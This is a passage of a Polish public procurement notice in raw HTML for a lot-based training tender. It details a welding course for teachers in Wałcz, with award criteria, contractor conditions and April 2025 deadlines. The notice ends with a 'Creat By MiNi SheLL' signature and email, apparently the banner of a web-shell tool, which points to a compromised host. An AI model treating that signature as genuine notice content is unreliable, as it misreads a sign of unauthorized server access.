class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie wykładowcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 14</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 14: Kurs spawania (dla nauczycieli)<br/>Spawanie blach i rur spoinami pachwinowymi stali niestopowych metodą MAG 135 <br/>a) Czas trwania: 145 godz. dla MAG 135<br/>b) Forma zajęć: stacjonarnie, zajęcia teoretyczne oraz zajęcia praktyczne <br/>c) Miejsce realizacji: Wałcz <br/>d) Liczba uczestników: 3 osób<br/>e) Liczba edycji szkolenia: 1 <br/>f) Terminy realizacji szkolenia: do dnia 30 września 2025 r. <br/>g) Program szkolenia powinien obejmować m.in. następujące zagadnienia: zastosowanie elektryczności do spawania łukowego; urządzenia spawalnicze; bezpieczeństwo i higiena pracy; bezpieczna praca na hali produkcyjnej; materiały dodatkowe do spawania; spawanie w praktyce; oznaczanie i wymiarowanie spoin; metody przygotowania złączy do spawania; kwalifikowanie spawaczy; budowa i użytkowanie urządzeń do spawania; elektrody wolframowe i materiały dodatkowe do spawania; podstawowe wiadomości o stalach nierdzewnych, metody spawania, ochrona zdrowia; spawalność, złącza spawane i odkształcenia złączy ze stali nierdzewnych; materiały dodatkowe do spawania stali nierdzewnych; korozja i obróbka cieplna po spawaniu; zajęcia praktyczne.<br/>h) Uczestnicy/czki otrzymają na własność odzież roboczą (spodnie robocze, koszula robocza, buty robocze niskie, rękawice spawalnicze)<br/>i) Szkolenie zakończy się egzaminem kwalifikacyjnym spawacza przed jednostką egzaminującą zgodnie z wymaganiami normy PN EN ISO 9606-1 Egzamin kwalifikacyjny spawacza – Spawanie – Część 1: Stale<br/>j) Po pozytywnym wyniku sprawdzianu Uczestnicy otrzymają książkę spawacza oraz świadectwo egzaminu kwalifikacyjnego spawacza.<br/>k) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>- posiadają atest upoważniający do szkolenia i egzaminowania spawaczy<br/>- dysponują wykładowcami posiadającymi tytuł IWE / EWE oraz uprawnienia personelu badań nieniszczących VT – dotyczy prowadzenia zajęć teoretycznych i zagadnień związanych z procesami spawania (<br/>- dysponują wykładowcami posiadającymi uprawnienia minimum inspektora bhp, uprawnienia inspektora ochrony przeciwpożarowej – dotyczy prowadzenia zajęć teoretycznych i zagadnień bezpieczeństwa i higieny pracy<br/>- dysponują instruktorami posiadającymi tytuł IWP (Międzynarodowy Instruktor Spawalniczy) oraz uprawnienia instruktora praktycznej nauki zawodu </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie wykładowcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich prowadzenia zawierają projektowane postanowienia umowy w sprawie zamówienia publicznego, stanowiące załącznik nr 4 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-10 15:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/powiatwalecki</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-10 15:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-05-09</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p> <p class="mb-0">Część 5 : <span class="normal">Tak</span></p> <p class="mb-0">Część 6 : <span class="normal">Tak</span></p> <p class="mb-0">Część 7 : <span class="normal">Tak</span></p> <p class="mb-0">Część 8 : <span class="normal">Tak</span></p> <p class="mb-0">Część 9 : <span class="normal">Tak</span></p> <p class="mb-0">Część 10 : <span class="normal">Tak</span></p> <p class="mb-0">Część 11 : <span class="normal">Tak</span></p> <p class="mb-0">Część 12 : <span class="normal">Tak</span></p> <p class="mb-0">Część 13 : <span class="normal">Tak</span></p> <p class="mb-0">Część 14 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com